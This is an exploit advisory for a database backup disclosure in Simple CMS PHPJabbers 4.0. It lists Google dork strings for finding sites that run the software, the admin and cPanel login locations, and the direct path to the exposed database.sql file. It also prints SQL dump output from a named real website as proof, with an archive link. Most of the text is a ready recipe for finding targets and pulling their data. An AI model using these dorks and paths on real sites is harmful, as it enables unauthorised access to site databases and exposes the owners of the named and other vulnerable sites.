Simple CMS PHPJabbers Stivasoft 4.0 Database Disclosure

1. #################################################################################################
2.  
3. # Exploit Title : Simple CMS PHPJabbers Stivasoft 4.0 Database Backup Disclosure
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 17/12/2018
6. # Vendor Homepage : phpjabbers.com ~ stivasoft.com ~ racingriverwebs.com
7. # Software Download Link : phpjabbers.com/simple-cms/
8. # Demo Software : demo.phpjabbers.com/1544995520_332/index.php?controller=pjAdminSections&action=pjActionIndex
9. + Login Details => Email: [email protected] Password: pass
10. # Tested On : Windows and Linux
11. # Category : WebApps
12. # Version Information : 4.0
13. # Exploit Risk : Medium
14. # Google Dorks : intext:''PHP Scripts Copyright © 2018 StivaSoft Ltd''
15. + intext:''Hotel Booking script by PHPJabbers.com -
16. + intext:''© Copyright Dravis Interests 2003-2018 Website by Racing River Website Solutions''
17. + intext:''Website by Racing River Website Solutions''
18. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
19. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
20. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
21.  
22. #################################################################################################
23.  
24. # Admin Panel Login Path :
25.  
26. /scms4/index.php?controller=Admin&action=login
27.  
28. # CPanel Login Path :
29.  
30. p3plcpnl0800.prod.phx3.secureserver.net:2083
31.  
32. # Exploit :
33.  
34. /scms4/app/config/database.sql
35.  
36. #################################################################################################
37.  
38. # Example SQL Dump Information => dravisinterests.com
39.  
40. DROP TABLE IF EXISTS `simple_cms_files`;
41. CREATE TABLE IF NOT EXISTS `simple_cms_files` (
42.  
43. DROP TABLE IF EXISTS `simple_cms_roles`;
44. CREATE TABLE IF NOT EXISTS `simple_cms_roles` (
45.  
46. DROP TABLE IF EXISTS `simple_cms_sections`;
47. CREATE TABLE IF NOT EXISTS `simple_cms_sections` (
48.  
49. DROP TABLE IF EXISTS `simple_cms_users`;
50. CREATE TABLE IF NOT EXISTS `simple_cms_users` (
51.  
52. DROP TABLE IF EXISTS `simple_cms_users_files`;
53. CREATE TABLE IF NOT EXISTS `simple_cms_users_files` (
54.  
55. DROP TABLE IF EXISTS `simple_cms_users_sections`;
56. CREATE TABLE IF NOT EXISTS `simple_cms_users_sections` (
57.  
58. DROP TABLE IF EXISTS `simple_cms_options`;
59. CREATE TABLE IF NOT EXISTS `simple_cms_options` (
60.  
61. INSERT INTO `simple_cms_roles` (`id`, `role`, `status`) VALUES
62. (1, 'admin', 'T'),
63. (2, 'editor', 'T');
64.  
65. #################################################################################################
66.  
67. # Example Vulnerable Site =>
68.  
69. [+] dravisinterests.com/scms4/app/config/database.sql => [ Proof of Concept for Vuln ] => archive.is/43J4N
70.  
71. #################################################################################################
72.  
73. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
74.  
75. #################################################################################################